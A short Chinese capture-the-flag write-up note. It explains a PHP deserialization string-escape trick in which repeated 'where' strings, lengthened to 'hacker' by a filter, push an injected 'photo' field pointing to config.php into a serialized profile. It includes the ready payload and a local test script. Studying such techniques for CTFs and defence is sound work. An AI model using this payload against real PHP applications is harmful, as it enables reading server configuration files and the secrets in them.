步骤:
nickname[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}
这题大佬的WP已经很详细了,我就记录一下其中一个点:为什么nickname要传那一堆?
<?php
function filter($string)
{
$escape = array(\'\\'\', \'\\\\\');
$escape = \'/\' . implode(\'|\', $escape) . \'/\';
$string = preg_replace($escape, \'_\', $string);
$safe = array(\'select\', \'insert\', \'update\', \'delete\', \'where\');
$safe = \'/\' . implode(\'|\', $safe) . \'/i\';
return preg_replace($safe, \'hacker\', $string);
}
$s = \'a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"ss@q.com";s:8:"nickname";a:1:{i:0;s:204:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere"};s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";}\';
var_dump(filter($s));
var_dump(unserialize($s));
var_dump(\'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\');
$a = filter($s);
var_dump($a);
var_dump(unserialize($a));
var_dump(\'**************************************************\');
// $profile = \'a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"ss@q.com";s:8:"nickname";s:8:"sea_sand";s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";}\';
$profile = \'a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"ss@q.com";s:8:"nickname";s:170:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";}\';
var_dump($profile);
var_dump(unserialize($profile));
where的code长度为170,变成hacker后长度为204,二者刚好差34。直接传一个204的where(此时的序列化语句是不正确的)让filter帮我们替换成hacker构造一个204的(这个序列化语句就是正确的了),然后后面的34的序列化语句,就是我们要传给photo的,把原来的photo序列化语句给挤出去。